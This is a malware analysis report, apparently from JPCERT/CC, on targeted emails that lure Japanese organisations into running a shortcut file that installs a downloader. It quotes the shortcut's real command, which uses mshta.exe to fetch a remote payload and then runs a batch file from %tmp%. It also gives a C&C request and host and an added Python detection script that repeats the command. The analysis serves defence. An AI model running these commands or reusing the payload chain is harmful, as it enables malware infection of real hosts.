Attack Convincing Users to Download a Malware-Containing Shortcut File
Since April 2019, JPCERT/CC has been observing attacks in which targeted emails are distributed to Japanese organisations, aiming to convince recipients to download a malicious shortcut file. These emails contain a link to a shortcut file on a cloud service. When this shortcut file is executed, a downloader launches.
This article describes the details of the downloader and the behaviour that follows.
How the downloader is launched
The following chart shows the flow of events from the shortcut file being launched until the downloader infects a host.
The shortcut files that JPCERT/CC has analysed contained the following code which downloads an HTML file (Fig 2) including VBScript. This VBScript creates and executes a VBS file (stwa.vbs) and a BAT file (Autorun.bat).
/c start /MIN %windir%\system32\mshta.exe http://pact.vgmtx.com/58l1hq/76pcik.php &ping 127.0.0.1&taskkill /f /im mshta.exe&%tmp%\Autorun.bat
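The behaviours chained in this argument string (mshta.exe fetching a remote URL, ping used as a delay, mshta.exe being killed, a script run from %tmp%) can be matched in shortcut-argument or process-creation telemetry. The following Python is an added example, not JPCERT/CC's code; the rule names, the triage levels and every sample line except the first are constructed for illustration, and the rules assume the unexpanded `%tmp%` form shown above.

```python
import re

# Behaviours taken from the shortcut arguments quoted above (rule names are hypothetical).
RULES = {
    "mshta_remote_url": re.compile(r"\bmshta(\.exe)?\b[^&|]*?\bhttps?://", re.I),
    "kills_mshta": re.compile(r"\btaskkill\b[^&|]*?/im\s+mshta\.exe", re.I),
    "runs_script_from_temp": re.compile(r"%te?mp%\\[^\s&|]+\.(bat|cmd|vbs|js)\b", re.I),
    "ping_as_delay": re.compile(r"\bping\b[^&|]*?\b127\.0\.0\.1\b", re.I),
}


def match_rules(cmdline):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage(cmdline):
    """'alert' when mshta fetches a URL and another behaviour is chained to it,
    'review' for a remote mshta fetch on its own, otherwise 'ignore'."""
    hits = match_rules(cmdline)
    if "mshta_remote_url" not in hits:
        return "ignore"
    return "alert" if len(hits) > 1 else "review"


# Constructed sample events; the first reuses the argument string from the article.
SAMPLES = [
    r"cmd.exe /c start /MIN %windir%\system32\mshta.exe http://pact.vgmtx.com/58l1hq/76pcik.php &ping 127.0.0.1&taskkill /f /im mshta.exe&%tmp%\Autorun.bat",
    r"C:\Windows\System32\mshta.exe https://intranet.example/app.hta",
    r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
    r"cmd.exe /c ping 127.0.0.1 & echo done",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage(sample), match_rules(sample), sample[:60])
```

Telemetry that records expanded environment variables would need the `%tmp%` rule adapted to the resolved temporary-directory path.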
When executed, stwa.vbs decodes the Base64-encoded data in the shortcut file (Fig 3) and saves it as a Windows executable file (stwa.exe) and a dummy Word file to display.
stwa.exe is in self-extract format (CAB) and creates a set of files (Table 1) when executed. Out of those, srdfqm.exe is the downloader that performs the main functions including communication.
Table 1: Files created by stwa.exe
| File name | Description |
|---|---|
| cp_cdis32.exe | Save srdfqm.exe in %APPDATA%\Microsoft\ |
| sd.exe | Add winpt.xml and winpt_n.xml to windows task |
| winpt.xml | Task XML file* |
| winpt_n.xml | Task XML file* |
*Please refer to Appendix B for tasks that are registered.
This malware simply serves as a downloader. It performs the following communication with a C&C server when executed. The first request asks for the name of the file to download.
GET /XwuM6u/edgeside.php
Host: monday.reuqest-userauth.com
Accept-Encoding: identity
The second outbound communication contains the file name which is obtained as a response to the first request. A file will be downloaded from the C&C server and saved to the device.
If the download is successful, the following will be sent as the third communication:
This malware is assumed to be built based on the following code:
So far, we have not been able to identify what kind of sample this malware downloads as a result of the above communication.
Although shortcut files are often used as the entry point of an attack, adversaries have been changing the actual attack techniques around them. We assume that similar targeted attacks are likely to continue.
Tasks that are created by the samples are listed in Appendix B. Also, a list of C&C servers that we confirmed is available in Appendix D. Please make sure that none of your devices is accessing these hosts.
Thank you for reading.
Shusei Tomonaga, Wataru Takahashi
(Translated by Yukako Uchida)
Appendix A: Shortcut file information
Table 2: Data contained in the shortcut file
| Drive serial number | d0e3-15e3 |
Appendix B: Registered Tasks
Table 3: Registered Task 1
Table 4: Registered Task 2
Appendix C: SHA-256 Hash Value of the sample
Appendix D: List of C&C servers